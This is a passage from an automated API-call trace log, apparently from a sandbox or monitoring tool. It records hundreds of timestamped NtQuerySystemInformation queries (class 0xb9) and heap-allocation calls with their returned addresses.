SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0207.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.624] GetProcessHeap () returned 0x27fc8db0000 [0207.624] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd160 [0207.624] GetProcessHeap () returned 0x27fc8db0000 [0207.624] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e35370 [0207.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.625] GetProcessHeap () returned 0x27fc8db0000 [0207.625] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9daec70 [0207.626] GetProcessHeap () returned 0x27fc8db0000 [0207.626] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9d35f50 [0207.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.626] GetProcessHeap () returned 0x27fc8db0000 [0207.626] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbd340 [0207.626] GetProcessHeap () returned 0x27fc8db0000 [0207.626] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e355b0 [0207.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0207.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.853] GetProcessHeap () returned 0x27fc8db0000 [0207.853] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbccb0 [0207.853] GetProcessHeap () returned 0x27fc8db0000 [0207.853] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e35370 [0207.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.856] GetProcessHeap () returned 0x27fc8db0000 [0207.856] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9daf0f0 [0207.856] GetProcessHeap () returned 0x27fc8db0000 [0207.856] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9d39670 [0207.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.856] GetProcessHeap () returned 0x27fc8db0000 [0207.856] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc9e0 [0207.856] GetProcessHeap () returned 0x27fc8db0000 [0207.856] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9e3f9b0 [0207.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd70, Length=0x50, ResultLength=0x0) [0207.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x50, ResultLength=0x0) [0207.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x50, ResultLength=0x0) [0207.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda40, Length=0x50, ResultLength=0x0) [0207.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x50, ResultLength=0x0) [0207.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x50, ResultLength=0x0) [0207.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x50, ResultLength=0x0) [0207.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x50, ResultLength=0x0) [0207.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x38, ResultLength=0x0) [0207.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0207.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd700, Length=0x28, ResultLength=0x0) [0207.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x38, ResultLength=0x0) [0207.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x28, ResultLength=0x0) [0207.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x28, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x20, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x38, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x38, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd670, Length=0x20, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd670, Length=0x20, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc90, Length=0x50, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc90, Length=0x50, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc90, Length=0x50, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x50, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x50, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x50, ResultLength=0x0) [0207.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x50, ResultLength=0x0) [0207.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0207.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0207.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0207.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0207.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0207.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0207.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0208.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc90, Length=0x50, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc90, Length=0x50, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc90, Length=0x50, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x50, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x50, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x50, ResultLength=0x0) [0208.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x50, ResultLength=0x0) [0208.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0208.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0208.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0208.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.272] NtQuerySystemInformation (SystemInformationClass=0xb9, 